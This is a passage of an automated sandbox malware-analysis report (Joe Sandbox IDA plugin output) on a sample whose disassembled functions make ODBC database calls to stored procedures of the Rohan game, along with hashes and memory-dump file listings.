                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: {? = CALL [ROHAN_GetUserCharacterMoney](?,?,?,?,?)}
                                                                                      • API String ID: 0-4230787193
                                                                                      • Opcode ID: fffa1b6f689025acfcd50cb6827ee7d261a62dec00519df34f992964e3963e95
                                                                                      • Instruction ID: f25f103d16c7004b1252bb87f4e008da778e575e9d18753d827d29c7d803fcd5
                                                                                      • Opcode Fuzzy Hash: fffa1b6f689025acfcd50cb6827ee7d261a62dec00519df34f992964e3963e95
                                                                                      • Instruction Fuzzy Hash: AE411DB5644216BFEB308B44CC52FBD7334EB84B14F208298F72C6E6C9DAB169419B58
                                                                                      APIs
                                                                                      • #19.ODBC32(?,{ ? = CALL [Rohan_Rare_ItemControl_Pickup_Log] (?,?,?,?,?)},000000FD), ref: 004388F3
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000), ref: 00438935
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000004,000000F0,00000004,00000000), ref: 0043896A
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 004389A2
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 004389DA
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 00438A12
                                                                                      • #72.ODBC32(?,00000000,00000001,00000001,0000000C,00000014,00000000,?,00000015,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 00438A4A
                                                                                      Strings
                                                                                      • { ? = CALL [Rohan_Rare_ItemControl_Pickup_Log] (?,?,?,?,?)}, xrefs: 004388EA
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: { ? = CALL [Rohan_Rare_ItemControl_Pickup_Log] (?,?,?,?,?)}
                                                                                      • API String ID: 0-1413586414
                                                                                      • Opcode ID: 40b4cd50f6af6289312743cebbc3b5cb3d5fdc70e704f29723d2d044e809b5f4
                                                                                      • Instruction ID: 599c74dfae63675003477e64e56c7f2f03cb1134035d04601802e0b6a4f9290e
                                                                                      • Opcode Fuzzy Hash: 40b4cd50f6af6289312743cebbc3b5cb3d5fdc70e704f29723d2d044e809b5f4
                                                                                      • Instruction Fuzzy Hash: EA41E0B16802147BEB249B94CD52FAA7335EB84B18F10818AF71C7E6C5D5B17DC09B68
                                                                                      APIs
                                                                                      • #19.ODBC32(?,{ ? = CALL [Rohan_InsertItemControl_Info] (?,?,?,?,?) },000000FD), ref: 00438B5D
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000), ref: 00438B9F
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000004,000000F0,00000004,00000000), ref: 00438BD7
                                                                                      • #72.ODBC32(?,00000000,00000001,00000001,0000000C,00000032,00000000,?,00000033,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 00438C0F
                                                                                      • #72.ODBC32(?,00000000,00000001,000000FA,000000FA,00000000,00000000,?,00000000,00000000,?,00000000,00000001,00000001,0000000C,00000032), ref: 00438C47
                                                                                      • #72.ODBC32(?,00000000,00000001,000000FA,000000FA,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000FA,000000FA,00000000), ref: 00438C7C
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000FA,000000FA,00000000), ref: 00438CB4
                                                                                      Strings
                                                                                      • { ? = CALL [Rohan_InsertItemControl_Info] (?,?,?,?,?) }, xrefs: 00438B54
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: { ? = CALL [Rohan_InsertItemControl_Info] (?,?,?,?,?) }
                                                                                      • API String ID: 0-1172602725
                                                                                      • Opcode ID: 73e71a768a2a0b1a9a9c92a602e2711c9ac14d8f29f9d28b81f6632b29c5cfaf
                                                                                      • Instruction ID: a77d4b5aee789027a5f2c0f8efd5fbcd2d8dbd0af0e3069bfc114a1fd566c1eb
                                                                                      • Opcode Fuzzy Hash: 73e71a768a2a0b1a9a9c92a602e2711c9ac14d8f29f9d28b81f6632b29c5cfaf
                                                                                      • Instruction Fuzzy Hash: CB4113B0A547187FEB248B84CC52FAA7334EB80B15F10828BFA157E2D5D5B27D408F68
                                                                                      APIs
                                                                                      • LoadIconA.USER32(:A,00000082), ref: 00410A48
                                                                                      • LoadCursorA.USER32(00000000,00007F00), ref: 00410A58
                                                                                      • LoadIconA.USER32(?,00000082), ref: 00410A7F
                                                                                      • RegisterClassExA.USER32(00000030), ref: 00410A8C
                                                                                      • RegisterClassExA.USER32(00000030), ref: 00410AA4
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID: Load$ClassIconRegister$Cursor
                                                                                      • String ID: 0$:A$m
                                                                                      • API String ID: 1628326422-2350434581
                                                                                      • Opcode ID: 34e115930ad538619a5120b78b9b90e33d45173eaaa402b46f2f1b4f4b3f1c31
                                                                                      • Instruction ID: ca039faef4c424ef8ea3c8aef419a4376db91ed66920d3b21320b28d19a0a330
                                                                                      • Opcode Fuzzy Hash: 34e115930ad538619a5120b78b9b90e33d45173eaaa402b46f2f1b4f4b3f1c31
                                                                                      • Instruction Fuzzy Hash: CD11DEB8D04308AFDB00EFD0D948BEEBBB4FB04305F10815AE90466251D7B95644CFA8
                                                                                      APIs
                                                                                      • #4.ODBC32(?,00000000,000000F0,?,00000000,00000000), ref: 0044992F
                                                                                      • #4.ODBC32(?,00000000,000000F0,?,00000000,00000000,?,00000000,000000F0,?,00000000,00000000), ref: 0044995F
                                                                                      • #4.ODBC32(?,00000000,000000FE,?,0000002A,00000000,?,00000000,000000F0,?,00000000,00000000,?,00000000,000000F0,?), ref: 0044998F
                                                                                      • #4.ODBC32(?,00000000,000000FA,?,00000000,00000000,?,00000000,000000FE,?,0000002A,00000000,?,00000000,000000F0,?), ref: 004499BF
                                                                                      • #4.ODBC32(?,00000000,000000FA,?,00000000,00000000,?,00000000,000000FA,?,00000000,00000000,?,00000000,000000FE,?), ref: 004499EF
                                                                                      • #4.ODBC32(?,00000000,000000FA,?,00000000,00000000,?,00000000,000000FA,?,00000000,00000000,?,00000000,000000FA,?), ref: 00449A1F
                                                                                      • #4.ODBC32(?,00000000,000000F1,?,00000000,00000000,?,00000000,000000FA,?,00000000,00000000,?,00000000,000000FA,?), ref: 00449A4F
                                                                                      • #4.ODBC32(?,00000000,000000F1,?,00000000,00000000,?,00000000,000000F1,?,00000000,00000000,?,00000000,000000FA,?), ref: 00449A7F
                                                                                      • #4.ODBC32(?,00000000,000000F1,?,00000000,00000000,?,00000000,000000F1,?,00000000,00000000,?,00000000,000000F1,?), ref: 00449AAF
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 70422ee6cee81ed561446415b1f0cd749a659b7572d522cf6068d68cb3bf6603
                                                                                      • Instruction ID: 99d9d8755a6cf0d113232fbbf52d5f4c5b69bc6f3bea0cb0d099a5db6ca6654d
                                                                                      • Opcode Fuzzy Hash: 70422ee6cee81ed561446415b1f0cd749a659b7572d522cf6068d68cb3bf6603
                                                                                      • Instruction Fuzzy Hash: 7351EDB5A00219ABEB24DB09CD99FAA7375FF44714F14C2C8F6296B3C2D671AE408F54
                                                                                      APIs
                                                                                      • #4.ODBC32(?,00000000,000000F0,?,00000000,00000000), ref: 0044A9FF
                                                                                      • #4.ODBC32(?,00000000,00000001,?,00000015,00000000,?,00000000,000000F0,?,00000000,00000000), ref: 0044AA2F
                                                                                      • #4.ODBC32(?,00000000,000000F0,?,00000000,00000000,?,00000000,00000001,?,00000015,00000000,?,00000000,000000F0,?), ref: 0044AA5F
                                                                                      • #4.ODBC32(?,00000000,000000F0,?,00000000,00000000,?,00000000,000000F0,?,00000000,00000000,?,00000000,00000001,?), ref: 0044AA8F
                                                                                      • #4.ODBC32(?,00000000,000000FA,?,00000000,00000000,?,00000000,000000F0,?,00000000,00000000,?,00000000,000000F0,?), ref: 0044AABF
                                                                                      • #4.ODBC32(?,00000000,000000F0,?,00000000,00000000,?,00000000,000000FA,?,00000000,00000000,?,00000000,000000F0,?), ref: 0044AAEF
                                                                                      • #4.ODBC32(?,00000000,0000005D,?,00000000,00000000,?,00000000,000000F0,?,00000000,00000000,?,00000000,000000FA,?), ref: 0044AB1F
                                                                                      • #4.ODBC32(?,00000000,000000F0,?,00000000,00000000,?,00000000,0000005D,?,00000000,00000000,?,00000000,000000F0,?), ref: 0044AB4F
                                                                                      • #4.ODBC32(?,00000000,000000F0,?,00000000,00000000,?,00000000,000000F0,?,00000000,00000000,?,00000000,0000005D,?), ref: 0044AB7F
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 491e7d911ba262e020a081cbfc1a55fac8f1b5cf8d4b9ff1e308a6cdb024976e
                                                                                      • Instruction ID: 6d83d27cf763df5787d0ed971520dc3fff4cfb36883f522fa728872f2f6bc6ad
                                                                                      • Opcode Fuzzy Hash: 491e7d911ba262e020a081cbfc1a55fac8f1b5cf8d4b9ff1e308a6cdb024976e
                                                                                      • Instruction Fuzzy Hash: B05130B0A00919ABDB24EB49CD55FAAB335EFC4719F1081C8F6186B3C1E675AD848F5C
                                                                                      APIs
                                                                                      • #4.ODBC32(?,00000000,000000F0,?,00000000,00000000), ref: 00444A37
                                                                                      • #4.ODBC32(?,00000000,00000001,?,00000012,00000000,?,00000000,000000F0,?,00000000,00000000), ref: 00444A5B
                                                                                      • #4.ODBC32(?,00000000,000000FE,?,00000064,00000000,?,00000000,00000001,?,00000012,00000000,?,00000000,000000F0,?), ref: 00444A7F
                                                                                      • #4.ODBC32(?,00000000,000000FE,?,0000042C,00000000,?,00000000,000000FE,?,00000064,00000000,?,00000000,00000001,?), ref: 00444AA9
                                                                                      • #4.ODBC32(?,00000000,000000F0,?,00000000,00000000,?,00000000,000000FE,?,0000042C,00000000,?,00000000,000000FE,?), ref: 00444ACF
                                                                                      • #4.ODBC32(?,00000000,000000FE,?,00000064,00000000,?,00000000,000000F0,?,00000000,00000000,?,00000000,000000FE,?), ref: 00444AF6
                                                                                      • #4.ODBC32(?,00000000,000000E7,?,00000000,00000000,?,00000000,000000FE,?,00000064,00000000,?,00000000,000000F0,?), ref: 00444B1D
                                                                                      • #4.ODBC32(?,00000000,000000F0,?,00000000,00000000,?,00000000,000000E7,?,00000000,00000000,?,00000000,000000FE,?), ref: 00444B43
                                                                                      • #4.ODBC32(?,00000000,000000FA,?,00000000,00000000,?,00000000,000000F0,?,00000000,00000000,?,00000000,000000E7,?), ref: 00444B6A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: ec27d4d517951ab1a0377d6284264b68db561660b445f5a91a361bdce1168479
                                                                                      • Instruction ID: 7008e1bf45e8db7029ad63bfb63384697c092d382e583739333f44c50d6983f2
                                                                                      • Opcode Fuzzy Hash: ec27d4d517951ab1a0377d6284264b68db561660b445f5a91a361bdce1168479
